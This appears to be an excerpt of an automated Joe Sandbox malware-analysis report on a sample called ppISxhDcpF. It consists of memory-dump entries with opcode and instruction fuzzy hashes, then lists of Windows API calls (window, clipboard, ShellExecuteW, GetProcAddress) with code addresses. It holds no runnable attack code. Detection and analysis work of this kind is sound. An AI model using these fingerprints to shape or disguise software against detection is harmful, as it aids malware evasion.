                                                                                                                • Instruction ID: e0b8e3b402a6d0324b3fa906912abc5d195e384f84c8c23df58e0dc172c62041
                                                                                                                • Opcode Fuzzy Hash: bf8726f1dadcf9b420ac48390d1d7b74d9d10efe79b223506a4265acbdf9a54f
                                                                                                                • Instruction Fuzzy Hash: B0C1A178E00218CFDB14DFA5C994B9DBBB2BF89300F6081A9D809AB355DB355E81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8946e2c27ebdfd598abc6d2e6491cbae8708737166d9db51de2c73654373d069
                                                                                                                • Instruction ID: 7f6f8f930339bd38302275e83ac496dffa62acb1e5ff2a99639a106de6ca9d43
                                                                                                                • Opcode Fuzzy Hash: 8946e2c27ebdfd598abc6d2e6491cbae8708737166d9db51de2c73654373d069
                                                                                                                • Instruction Fuzzy Hash: DFC1A178E00218CFDB15DFA5C994B9DBBB2BF89300F6081A9D809AB355DB359E85CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6d78ec2f974ceec3d3b1e03a86b8e1ace231ae6e870fa683eceebf9122cf126e
                                                                                                                • Instruction ID: ed7b3335536d30bdf54147fb89ee7ef91c4714accf26c4a1c00d838e854fd97e
                                                                                                                • Opcode Fuzzy Hash: 6d78ec2f974ceec3d3b1e03a86b8e1ace231ae6e870fa683eceebf9122cf126e
                                                                                                                • Instruction Fuzzy Hash: A2C1A174E00218CFEB15DFA5C954B9DBBB2BF89300F6081A9D809AB355DB359E85CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 78d41433034548772d009b022577f11644edbef5a62a7c40ef5ca4907e696811
                                                                                                                • Instruction ID: 4165603a3a068ad9481423ee9575c422118e95afff9eab11635cdbd7009e68e1
                                                                                                                • Opcode Fuzzy Hash: 78d41433034548772d009b022577f11644edbef5a62a7c40ef5ca4907e696811
                                                                                                                • Instruction Fuzzy Hash: F4C1A174E00218CFEB54DFA5C994B9DBBB2BF89300F6081A9D809AB355DB359E85CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f21eec3ae21d5b9f66564b8f2080c9b76fab3431f28955f3d822eb3b29600f29
                                                                                                                • Instruction ID: cdf620231a5c6ff853b05ee27be0ee70126cbf6f878cb3e31720072b80a54722
                                                                                                                • Opcode Fuzzy Hash: f21eec3ae21d5b9f66564b8f2080c9b76fab3431f28955f3d822eb3b29600f29
                                                                                                                • Instruction Fuzzy Hash: 31C1A178E00218CFDB14DFA5C994B9DBBB2BF89300F6081A9D909AB355DB355E81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 84eb390c546f833bda45e1b9207730dbe3872772a40356beb821d4d944978570
                                                                                                                • Instruction ID: d88d73bfd805b61ac71e2cd99d0562e9c82508e432af9ff62260aaed133c8b6a
                                                                                                                • Opcode Fuzzy Hash: 84eb390c546f833bda45e1b9207730dbe3872772a40356beb821d4d944978570
                                                                                                                • Instruction Fuzzy Hash: 7CC1A278E00218CFDB15DFA5C954B9DBBB2BF89300F5081A9D809AB355DB355E85CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5f93a30ac9012cce94871b619b4219c3b1a6874d3f1d9e1779436d6d4ea625c6
                                                                                                                • Instruction ID: ac6f4909da38e31e7d8e80e3da0fc413302fb44c06eb06adee8c97031fe1e07f
                                                                                                                • Opcode Fuzzy Hash: 5f93a30ac9012cce94871b619b4219c3b1a6874d3f1d9e1779436d6d4ea625c6
                                                                                                                • Instruction Fuzzy Hash: 00C1B074E00218CFEB15DFA5C994B9DBBB2BF89300F6081A9D809AB355DB359E85CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 439920cab5a8b70e4eaaa6660aed6442c2e6d964cbb6720ac869a76dd10581d3
                                                                                                                • Instruction ID: 7d5769727f902e80d808c59b7766ef4332dbc8d0f462ec0575e21cf4fd35fbe6
                                                                                                                • Opcode Fuzzy Hash: 439920cab5a8b70e4eaaa6660aed6442c2e6d964cbb6720ac869a76dd10581d3
                                                                                                                • Instruction Fuzzy Hash: 25C1A074E00218CFEB14DFA5C994B9DBBB2AF89300F6081A9D809BB355DB359E85CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 241d919c2afa4a0092f5024fc8aba0dfecaf2bae352e0eba3340a24e6b41abf0
                                                                                                                • Instruction ID: 532eb01389089e5f462444bbcac23dab2d0ffd17f8f1fa4369c04196a4e26128
                                                                                                                • Opcode Fuzzy Hash: 241d919c2afa4a0092f5024fc8aba0dfecaf2bae352e0eba3340a24e6b41abf0
                                                                                                                • Instruction Fuzzy Hash: 35C19074E00218CFDB15DFA5C994B9DBBB2AF89300F6081A9D809BB355DB359E85CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8d5872947cf2672aaab5d4268bea5029e550cc0d8b23b06f9907be07afbb16ea
                                                                                                                • Instruction ID: 27b2682dd86c3a68a7e3cf2e08ce2753d18cff11c9e1c27acf79e03690dddc6d
                                                                                                                • Opcode Fuzzy Hash: 8d5872947cf2672aaab5d4268bea5029e550cc0d8b23b06f9907be07afbb16ea
                                                                                                                • Instruction Fuzzy Hash: BAC1A078E00218CFEB14DFA5C954B9DBBB2BF89300F6081A9D809AB355DB359E85CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 04b8565fe70008a0c86f9994686b38d77e25bec07619c3d08058775084e5b114
                                                                                                                • Instruction ID: 280c938bfdb45c69caf9cc248882348db05d0bd7d6a85d6ea252cadc73cee848
                                                                                                                • Opcode Fuzzy Hash: 04b8565fe70008a0c86f9994686b38d77e25bec07619c3d08058775084e5b114
                                                                                                                • Instruction Fuzzy Hash: FBC1A178E00218CFDB54DFA5C954B9DBBB2BF89300F6081A9D809AB355DB359E85CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6ffbba5ec61b978aa60527b7f5ddaacb94755cd4c536621fa3f46f648e808a91
                                                                                                                • Instruction ID: 3e7f1d145b09afe5f7f52a5c5c63fe2dbc8068b5b9477f4a2616fb624112ee43
                                                                                                                • Opcode Fuzzy Hash: 6ffbba5ec61b978aa60527b7f5ddaacb94755cd4c536621fa3f46f648e808a91
                                                                                                                • Instruction Fuzzy Hash: 06C1A074E00218CFEB54DFA5C954B9DBBB2BF89300F6081A9D809AB355DB359E85CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: dd3140569e9d6875f0a3df907c3d4779a8e0a463e0f8ee4fd2d885bab72caa14
                                                                                                                • Instruction ID: fcb1f5ff03071f33fcc1c5e507e5fc3bd7341a4c531c5418eda2d928fcb120ea
                                                                                                                • Opcode Fuzzy Hash: dd3140569e9d6875f0a3df907c3d4779a8e0a463e0f8ee4fd2d885bab72caa14
                                                                                                                • Instruction Fuzzy Hash: 98C1A074E00218CFEB14DFA5C954B9DBBB2BF89300F6081A9D809AB355DB359E85CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ee5706b139daa00a8045cef46a3b56303c35b82f601edcea2fb6bc9519f14427
                                                                                                                • Instruction ID: 2e6801419344d51b9750236f7747b0810fdfce2bcbd85efd51864140558d5848
                                                                                                                • Opcode Fuzzy Hash: ee5706b139daa00a8045cef46a3b56303c35b82f601edcea2fb6bc9519f14427
                                                                                                                • Instruction Fuzzy Hash: 4EC1A178E00218CFEB54DFA5C954B9DBBB2BF89300F6081A9D409AB355DB359E85CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2736836506.0000000038010000.00000040.00000800.00020000.00000000.sdmp, Offset: 38010000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38010000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8cdbcd911cd6b6349fe6027926f3a9d5ebb4158858a43c5855eff5dbf919b2cd
                                                                                                                • Instruction ID: a7c746369f1b9f94fc9416c81b28569c97f0a06faae32bea4a0507622a3a445b
                                                                                                                • Opcode Fuzzy Hash: 8cdbcd911cd6b6349fe6027926f3a9d5ebb4158858a43c5855eff5dbf919b2cd
                                                                                                                • Instruction Fuzzy Hash: D2C19F78E00218CFDB54DFA5C994B9DBBB2BF89300F6081A9D809AB355DB359A85CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2736836506.0000000038010000.00000040.00000800.00020000.00000000.sdmp, Offset: 38010000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38010000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 363231ccf2243e11ef043679435eadb5304baaa4041649821273dc0cbdcb4e4a
                                                                                                                • Instruction ID: cd5e2d29bf16bb0457602518f374a6ce4fff0dd9f14f8700fcb5baab97b8055c
                                                                                                                • Opcode Fuzzy Hash: 363231ccf2243e11ef043679435eadb5304baaa4041649821273dc0cbdcb4e4a
                                                                                                                • Instruction Fuzzy Hash: 26C18F78E00218CFDB54DFA5C994B9DBBB2BF89300F6081A9D909BB355DB359A81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2736836506.0000000038010000.00000040.00000800.00020000.00000000.sdmp, Offset: 38010000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38010000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 52468259e4e32c28178b618ee1775249c02bf18b4d091694fc85bb85e7fb056f
                                                                                                                • Instruction ID: abb11bd33f9357d1d5ba9b859ecd6dee22070e720e00a62f6911df1e57091234
                                                                                                                • Opcode Fuzzy Hash: 52468259e4e32c28178b618ee1775249c02bf18b4d091694fc85bb85e7fb056f
                                                                                                                • Instruction Fuzzy Hash: DFC19F78E00218CFDB54DFA5C994B9DBBB2BF89300F6081A9D909BB355DB359A81DF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2736836506.0000000038010000.00000040.00000800.00020000.00000000.sdmp, Offset: 38010000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38010000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fda061335ea52ed4d451387c37610afc6452f289e690e59ccae92340a61bf814
                                                                                                                • Instruction ID: 364f0eadf5c46e0b145c49dc08a918dc25e277855e8da5959f3168c936a9ac37
                                                                                                                • Opcode Fuzzy Hash: fda061335ea52ed4d451387c37610afc6452f289e690e59ccae92340a61bf814
                                                                                                                • Instruction Fuzzy Hash: E4C19F78E00218CFDB54DFA5C994B9DBBB2BF89300F6081A9D909BB355DB359A85CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ba386bff9dcdd2b4b21b200cb19a096ae5e77c296a7cea19dbc0ca97cc8bb302
                                                                                                                • Instruction ID: be31583e7f46e1c0e908139a2eba4346348e263db7ec8abe7aaba45601677202
                                                                                                                • Opcode Fuzzy Hash: ba386bff9dcdd2b4b21b200cb19a096ae5e77c296a7cea19dbc0ca97cc8bb302
                                                                                                                • Instruction Fuzzy Hash: 44A19D74E01228CFDB65DF64C894B99BBB2BB8A301F5095EAD44DA7350DB319E81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 80ae9027088a0a5f423dbfd0bad1da7e44051ded1dd8a6c43372acc84dd8fecd
                                                                                                                • Instruction ID: cb980102654906a4857d965384147edf00c73bbede90d206a3beee71dfbdfd87
                                                                                                                • Opcode Fuzzy Hash: 80ae9027088a0a5f423dbfd0bad1da7e44051ded1dd8a6c43372acc84dd8fecd
                                                                                                                • Instruction Fuzzy Hash: 46518074A01229CFDB65DF60C854B9DB7B2BB4A301F5095EAD40AA7350DB329E82CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 39a71c4a60058bc55a7e8eb51607c469a03c879d89c4446ca0ea7ddcd2075c62
                                                                                                                • Instruction ID: c4f96e064da74ccbec3d04fa49f014b2e9088cbcd12d8c6d4318a3751fe3b677
                                                                                                                • Opcode Fuzzy Hash: 39a71c4a60058bc55a7e8eb51607c469a03c879d89c4446ca0ea7ddcd2075c62
                                                                                                                • Instruction Fuzzy Hash: 21D06C78E4421C8ACB21DFA4D9442ECB771BBAA320F0024E6808CA7200DB709E948A56
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 00405351
                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                                                                                                • GetClientRect.USER32(?,?), ref: 0040539D
                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                                                                                                • ShowWindow.USER32(?,?), ref: 00405440
                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405461
                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 0040536F
                                                                                                                  • Part of subcall function 0040414E: SendMessageW.USER32(?,?,00000001,00403F7A), ref: 0040415C
                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004054B3
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004054C8
                                                                                                                • ShowWindow.USER32(00000000), ref: 004054EC
                                                                                                                • ShowWindow.USER32(?,?), ref: 004054F1
                                                                                                                • ShowWindow.USER32(?), ref: 0040553B
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                                                                                                • CreatePopupMenu.USER32 ref: 00405580
                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004055B4
                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                                                                                                • OpenClipboard.USER32(00000000), ref: 00405615
                                                                                                                • EmptyClipboard.USER32 ref: 0040561B
                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405631
                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                                                                                                • CloseClipboard.USER32 ref: 00405676
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                • String ID: {
                                                                                                                • API String ID: 590372296-366298937
                                                                                                                • Opcode ID: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
                                                                                                                • Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
                                                                                                                • Opcode Fuzzy Hash: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
                                                                                                                • Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58
                                                                                                                APIs
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                                                                                                • ShowWindow.USER32(?), ref: 00403C9A
                                                                                                                • DestroyWindow.USER32 ref: 00403CAE
                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                                                                                                • GetDlgItem.USER32(?,?), ref: 00403CEB
                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403DB4
                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                                                                                                • EnableWindow.USER32(?,?), ref: 00403F02
                                                                                                                • EnableWindow.USER32(?,?), ref: 00403F1D
                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
                                                                                                                • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                                                                                                • SendMessageW.USER32(?,?,00000000,00000001), ref: 00403F52
                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                                                                                                • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                                                                                                • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 184305955-0
                                                                                                                • Opcode ID: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
                                                                                                                • Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
                                                                                                                • Opcode Fuzzy Hash: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
                                                                                                                • Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D
                                                                                                                APIs
                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404368
                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
                                                                                                                • GetSysColor.USER32(?), ref: 00404396
                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                                                                                                • lstrlenW.KERNEL32(?), ref: 004043B7
                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                                                                                                • SendMessageW.USER32(00000000), ref: 00404439
                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404464
                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                                                                                                • SetCursor.USER32(00000000), ref: 004044B8
                                                                                                                • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                                                                                                • SetCursor.USER32(00000000), ref: 004044DC
                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
                                                                                                                • SendMessageW.USER32(?,00000000,00000000), ref: 0040451D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                • String ID: -B@$N$open
                                                                                                                • API String ID: 3615053054-1057335957
                                                                                                                • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                                                                                                                • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,?,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                  • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
